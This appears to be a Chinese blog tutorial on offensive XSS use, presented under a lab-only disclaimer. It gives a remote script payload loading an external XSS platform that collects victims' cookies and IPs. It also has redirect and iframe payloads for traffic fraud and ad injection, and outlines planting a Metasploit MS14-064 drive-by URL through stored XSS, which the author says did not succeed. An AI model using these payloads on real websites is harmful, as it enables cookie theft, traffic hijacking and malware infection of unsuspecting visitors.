XSS高级用法,SEO,挂ma,MS14_064利用
以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!!

xss平台:https://xssaq.com/
<sCRiPt sRC=//xs.pe/PNb></sCrIpT>

这里有一个xsslabs,利用我们的payload

xss平台已上线

查看功能

这里面有源码,xss站点的ua头,还有存储用户cookie信息机器的真实IP地址

地址很明确,是我自己的地址

广告传播/SEO优化/刷取流量
原理
通过恶意的xss代码将正常的页面跳转到目的地的页面,利用网站进行重定向实现引流、广告位传播等等。
实操
恶意刷取访问量,网页直接跳转
<script type="text/javascript">window.location.href="跳转的目的地址";</script>
<script type="text/javascript">window.location.replace("跳转的目的地址");</script>
<script type="text/javascript">window.location.assign("跳转的目的地址");</script>

注入成功,再次访问这个页面就会自动跳转到你的页面,从而达到访问量+1

第二种,网页延迟跳转
<script type="text/javascript">
function jumurl(){
window.location.href = 'https://www.baidu.com';
}
setTimeout(jumurl,3000);
</script>
恶意广告展示(需要5块钱吃外卖的记得扫个码嘞,美团优惠卷+平台双减)
<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://pic1.zhimg.com/v2-656b7df981ea18d18f196995f477d75d_xll.jpg?source=32738c0c&needBackground=1></iframe>");</script>

三、网页挂马/权限提升(MS14_064)
目的
通过木马服务器(kali)搭建生成一个恶意URL地址,并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面,恶意攻击者便获取到了受害者的控制权限(重点在于目的系统是否打了相应补丁)
环境
木马服务器(Kali MS14-064 IP:192.168.7.129)
受害者(Windows Server 2003 R2 IP:192.168.7.136)
存在 XSS 的服务器(Win10 DVWA靶机 IP:192.168.1.103)
MS14_064:受影响的操作系统版本有:Windows Vista、Windows Server 2012、Windows Server 2008、Windows RT、Windows 8.1、Windows 8 以及 Windows 7.
打开msf

搜索 ms14_064

依次设置好参数

没有成功,不知道为什么,我win7补丁都卸载了,这里只做演示,可以参考下文
https://blog.csdn.net/theRavensea/article/details/136793078

XSS插入地址
这个时候就能利用存储型xss漏洞将木马服务器生成的地址插入到网站中,这样只要有人的电脑存在该漏洞,就能上线:

可自行测试,我这里不是全新的win7,没有成功

学习于:
https://blog.csdn.net/Aaron_Miller/article/details/105918848
往期推荐
111
本站小部分内容转载于互联网,如有侵权还请联系















暂无评论内容